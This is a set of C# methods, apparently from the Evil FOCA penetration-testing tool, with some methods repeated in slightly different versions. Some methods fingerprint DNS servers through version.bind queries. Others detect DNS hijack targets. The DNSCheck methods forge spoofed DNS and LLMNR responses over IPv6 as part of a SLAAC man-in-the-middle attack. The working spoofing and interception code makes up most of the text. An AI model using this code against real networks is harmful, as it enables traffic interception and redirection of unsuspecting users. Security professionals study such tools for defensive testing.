public override void GetVersion() { try { System.Net.IPAddress[] ips = System.Net.Dns.GetHostAddresses(Host); if (ips.Length == 0) { return; } // Hace la query como 'TXT'. Es mejor hacerla como 'ALL', pero no veo la opción en la lista de QTypes. ¿Quizas ANY? Heijden.DNS.Resolver r = new Heijden.DNS.Resolver(ips[0], base.Port); r.TimeOut = 1000; Heijden.DNS.Response response = r.Query("version.bind", Heijden.DNS.QType.TXT, Heijden.DNS.QClass.CH); if (response.RecordsTXT.Length > 0) { Version = response.RecordsTXT[0].TXT; this.os = AnalyzeBanner(Version); } if (this.FingerPrintingFinished != null) { FingerPrintingFinished(this, null); } } catch { if (FingerPrintingError != null) { FingerPrintingError(this, null); } } }
public string GetDnsServer(string domain) { string Dns = string.Empty; try { IPAddress DefaultDns = GetDefaultDns(); if (DefaultDns == null) return string.Empty; Dig dig = new Dig(); dig.resolver.TransportType = Heijden.DNS.TransportType.Tcp; Heijden.DNS.Response Response = dig.resolver.Query(domain, Heijden.DNS.QType.NS, Heijden.DNS.QClass.IN); if (Response != null) { if (Response.header.RCODE == Heijden.DNS.RCode.NoError) { if (Response.Answers.Count > 0) Dns = Response.Answers[0].RECORD.ToString().TrimEnd('.'); if (Response.Authorities.Count > 0) { //Dns = Response.Authorities[0].RECORD.ToString().Substring(0, Response.Authorities[0].RECORD.ToString().LastIndexOf('.')); Dns = Response.Authorities[0].RECORD.ToString().Substring(0, Response.Authorities[0].RECORD.ToString().IndexOf(' ')).TrimEnd('.'); } } } } catch (Exception) { Console.WriteLine("DNSServer konnte nicht gefunden werden.(DNSValidator/GetDNSServer)"); } return Dns; }
private bool ValidateDomain(string domain) { try { //IPAddress dnsServer = null; //IPAddress[] dnsAddresses = Dns.GetHostAddresses(dNSServer); //if (dnsAddresses.Length > 0) // dnsServer = dnsAddresses[0]; Dig dig = new Dig(); dig.resolver.DnsServer = dNSServer; dig.resolver.TimeOut = 500; dig.resolver.TransportType = Heijden.DNS.TransportType.Tcp; Heijden.DNS.Response Response = dig.resolver.Query(domain, Heijden.DNS.QType.A, Heijden.DNS.QClass.IN); if (Response != null) if (Response.header.RCODE == Heijden.DNS.RCode.NoError && Response.RecordsA.Length > 0) return true; } catch (Exception) { Console.WriteLine("DNSServer konnte nicht bestätigt werden (DnsValidator/ValidateDomain) k"); } return false; }
public bool CheckIfHijack(Packet p) { foreach (Data.Attack attack in attacks.Where(A => A.attackType == Data.AttackType.DNSHijacking && A.attackStatus == Data.AttackStatus.Attacking)) { if ((p.PayloadPacket != null && p.PayloadPacket.PayloadPacket != null) && (p.PayloadPacket.PayloadPacket is UdpPacket)) { EthernetPacket ethernet = (EthernetPacket)p; IpPacket ip = (IpPacket)p.PayloadPacket; UdpPacket udp = (UdpPacket)p.PayloadPacket.PayloadPacket; if ((udp.SourcePort == 53)) // La respuesta DNS { // Comprobamos que venga a nuestra MAC pero no a nuestra IP if (NeedToRoute(ip)) { try { Heijden.DNS.Response response = new Heijden.DNS.Response(new IPEndPoint(IPAddress.Parse("1.2.3.4"), 53), udp.PayloadData); DNSHijackAttack dnsAttack = (DNSHijackAttack)attack; foreach (Heijden.DNS.Question q in response.Questions) { if ((q.QName == dnsAttack.domain + ".") || dnsAttack.domain == "*") { return(true); } } } catch { return(false); } } else { return(false); } } } } return(false); }
public override void GetVersion() { try { System.Net.IPAddress[] ips = System.Net.Dns.GetHostAddresses(Host); if (ips.Length == 0) { return; } Heijden.DNS.Resolver r = new Heijden.DNS.Resolver(ips[0], base.Port); r.TimeOut = 10; Heijden.DNS.Response response = r.Query("version.bind", Heijden.DNS.QType.TXT, Heijden.DNS.QClass.CH); if (response.RecordsTXT.Length > 0) { OperatingSystem.OS os = OperatingSystem.OS.Unknown; Version = response.RecordsTXT.SelectMany(p => p.TXT.Where(q => !String.IsNullOrEmpty(q))) .FirstOrDefault(p => { os = AnalyzeBanner(p); return(os != OperatingSystem.OS.Unknown); } ); this.os = os; } if (this.FingerPrintingFinished != null) { FingerPrintingFinished(this, null); } } catch { if (FingerPrintingError != null) { FingerPrintingError(this, null); } } }
public bool CheckIfHijack(Packet p) { foreach (Data.Attack attack in attacks.Where(A => A.attackType == Data.AttackType.DNSHijacking && A.attackStatus == Data.AttackStatus.Attacking)) { if ((p.PayloadPacket != null && p.PayloadPacket.PayloadPacket != null) && (p.PayloadPacket.PayloadPacket is UdpPacket)) { EthernetPacket ethernet = (EthernetPacket)p; IpPacket ip = (IpPacket)p.PayloadPacket; UdpPacket udp = (UdpPacket)p.PayloadPacket.PayloadPacket; if ((udp.SourcePort == 53)) // La respuesta DNS { // Comprobamos que venga a nuestra MAC pero no a nuestra IP if (NeedToRoute(ip)) { try { Heijden.DNS.Response response = new Heijden.DNS.Response(new IPEndPoint(IPAddress.Parse("1.2.3.4"), 53), udp.PayloadData); DNSHijackAttack dnsAttack = (DNSHijackAttack)attack; foreach (Heijden.DNS.Question q in response.Questions) { if ((q.QName == dnsAttack.domain + ".") || dnsAttack.domain == "*") return true; } } catch { return false; } } else return false; } } } return false; }
private void DNSCheck(Packet p) { EthernetPacket ethernet = (EthernetPacket)p; if (p.PayloadPacket.PayloadPacket is UdpPacket) { UdpPacket udp = p.PayloadPacket.PayloadPacket as UdpPacket; attacks.Where(a => a.attackType == AttackType.SlaacMitm).ToList().ForEach(currentAttack => { MitmAttack mitmAttack = currentAttack as MitmAttack; if (p.PayloadPacket is IPv6Packet) { switch (udp.DestinationPort) { case 53: Heijden.DNS.Response response = new Heijden.DNS.Response(new IPEndPoint(IPAddress.Parse("1.2.3.4"), 53), udp.PayloadData); var aaaaDns = (from q in response.Questions where q.QType == Heijden.DNS.QType.AAAA || q.QType == Heijden.DNS.QType.A select q).ToList(); //Para mostrar la pelotita de conexión a internet OK, respondemos al paquete Teredo de Microsoft en formato A. var aTeredoDns = (from q in response.Questions where q.QType == Heijden.DNS.QType.A && (q.QName.ToLower().Contains("teredo") || q.QName.ToLower().Contains("msftncsi")) select q).ToList(); if (aaaaDns != null && aaaaDns.Count > 0) { DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData); string q = query.name; IPAddress[] ips = Dns.GetHostAddresses(q); DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv6, query.transID, query.nameDnsFormat, ips[0]); byte[] respByteAr = resp.GeneratePacket(); EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4); IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress); UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort); udpDns.PayloadData = respByteAr; ipv6Dns.PayloadPacket = udpDns; ethDns.PayloadPacket = ipv6Dns; udpDns.UpdateCalculatedValues(); udpDns.UpdateUDPChecksum(); ipv6Dns.UpdateCalculatedValues(); Program.CurrentProject.data.SendPacket(ethDns); } else if (aTeredoDns != null && aTeredoDns.Count > 0) { DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData); string q = query.name; IPAddress[] ips = Dns.GetHostAddresses(q); DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv4, query.transID, query.nameDnsFormat, ips[0]); byte[] respByteAr = resp.GeneratePacket(); EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4); IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress); UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort); udpDns.PayloadData = respByteAr; ipv6Dns.PayloadPacket = udpDns; ethDns.PayloadPacket = ipv6Dns; udpDns.UpdateCalculatedValues(); udpDns.UpdateUDPChecksum(); ipv6Dns.UpdateCalculatedValues(); Program.CurrentProject.data.SendPacket(ethDns); } break; case 5355: LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket(); llmnr.ParsePacket(udp.PayloadData); if (llmnr.Query.Type.HasValue && llmnr.Query.Type.Value == LLMNR.DNSType.AAAA) { IPAddress[] ips = (from ip in Dns.GetHostAddresses(llmnr.Query.Name) where ip.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork select ip).ToArray(); byte[] ipv6Addr = new byte[] { 0x00,0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0xff,0xff, (byte)ips[0].GetAddressBytes()[0],(byte)ips[0].GetAddressBytes()[1], (byte)ips[0].GetAddressBytes()[2] ,(byte)ips[0].GetAddressBytes()[3] }; llmnr.AnswerList.Add(new LLMNR.DNSAnswer() { Class = evilfoca.LLMNR.DNSClass.IN, Name = llmnr.Query.Name, Type = evilfoca.LLMNR.DNSType.AAAA, RData = ipv6Addr, RDLength = (short)ipv6Addr.Length }); EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4); IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress); UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort); udpDns.PayloadData = llmnr.BuildPacket(); ipv6Dns.PayloadPacket = udpDns; ethDns.PayloadPacket = ipv6Dns; udpDns.UpdateCalculatedValues(); udpDns.UpdateUDPChecksum(); ipv6Dns.UpdateCalculatedValues(); Program.CurrentProject.data.SendPacket(ethDns); } break; default: break; } } }); } }
private void DNSCheck(Packet p) { EthernetPacket ethernet = (EthernetPacket)p; if (p.PayloadPacket.PayloadPacket is UdpPacket) { UdpPacket udp = p.PayloadPacket.PayloadPacket as UdpPacket; attacks.Where(a => a.attackType == AttackType.SlaacMitm).ToList().ForEach(currentAttack => { MitmAttack mitmAttack = currentAttack as MitmAttack; if (p.PayloadPacket is IPv6Packet) { switch (udp.DestinationPort) { case 53: Heijden.DNS.Response response = new Heijden.DNS.Response(new IPEndPoint(IPAddress.Parse("1.2.3.4"), 53), udp.PayloadData); var aaaaDns = (from q in response.Questions where q.QType == Heijden.DNS.QType.AAAA || q.QType == Heijden.DNS.QType.A select q).ToList(); //Para mostrar la pelotita de conexión a internet OK, respondemos al paquete Teredo de Microsoft en formato A. var aTeredoDns = (from q in response.Questions where q.QType == Heijden.DNS.QType.A && (q.QName.ToLower().Contains("teredo") || q.QName.ToLower().Contains("msftncsi")) select q).ToList(); if (aaaaDns != null && aaaaDns.Count > 0) { DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData); string q = query.name; IPAddress[] ips = Dns.GetHostAddresses(q); DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv6, query.transID, query.nameDnsFormat, ips[0]); byte[] respByteAr = resp.GeneratePacket(); EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4); IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress); UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort); udpDns.PayloadData = respByteAr; ipv6Dns.PayloadPacket = udpDns; ethDns.PayloadPacket = ipv6Dns; udpDns.UpdateCalculatedValues(); udpDns.UpdateUDPChecksum(); ipv6Dns.UpdateCalculatedValues(); Program.CurrentProject.data.SendPacket(ethDns); } else if (aTeredoDns != null && aTeredoDns.Count > 0) { DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData); string q = query.name; IPAddress[] ips = Dns.GetHostAddresses(q); DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv4, query.transID, query.nameDnsFormat, ips[0]); byte[] respByteAr = resp.GeneratePacket(); EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4); IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress); UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort); udpDns.PayloadData = respByteAr; ipv6Dns.PayloadPacket = udpDns; ethDns.PayloadPacket = ipv6Dns; udpDns.UpdateCalculatedValues(); udpDns.UpdateUDPChecksum(); ipv6Dns.UpdateCalculatedValues(); Program.CurrentProject.data.SendPacket(ethDns); } break; case 5355: LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket(); llmnr.ParsePacket(udp.PayloadData); if (llmnr.Query.Type.HasValue && llmnr.Query.Type.Value == LLMNR.DNSType.AAAA) { IPAddress[] ips = (from ip in Dns.GetHostAddresses(llmnr.Query.Name) where ip.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork select ip).ToArray(); byte[] ipv6Addr = new byte[] { 0x00, 0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, (byte)ips[0].GetAddressBytes()[0], (byte)ips[0].GetAddressBytes()[1], (byte)ips[0].GetAddressBytes()[2], (byte)ips[0].GetAddressBytes()[3] }; llmnr.AnswerList.Add(new LLMNR.DNSAnswer() { Class = evilfoca.LLMNR.DNSClass.IN, Name = llmnr.Query.Name, Type = evilfoca.LLMNR.DNSType.AAAA, RData = ipv6Addr, RDLength = (short)ipv6Addr.Length }); EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4); IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress); UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort); udpDns.PayloadData = llmnr.BuildPacket(); ipv6Dns.PayloadPacket = udpDns; ethDns.PayloadPacket = ipv6Dns; udpDns.UpdateCalculatedValues(); udpDns.UpdateUDPChecksum(); ipv6Dns.UpdateCalculatedValues(); Program.CurrentProject.data.SendPacket(ethDns); } break; default: break; } } }); } }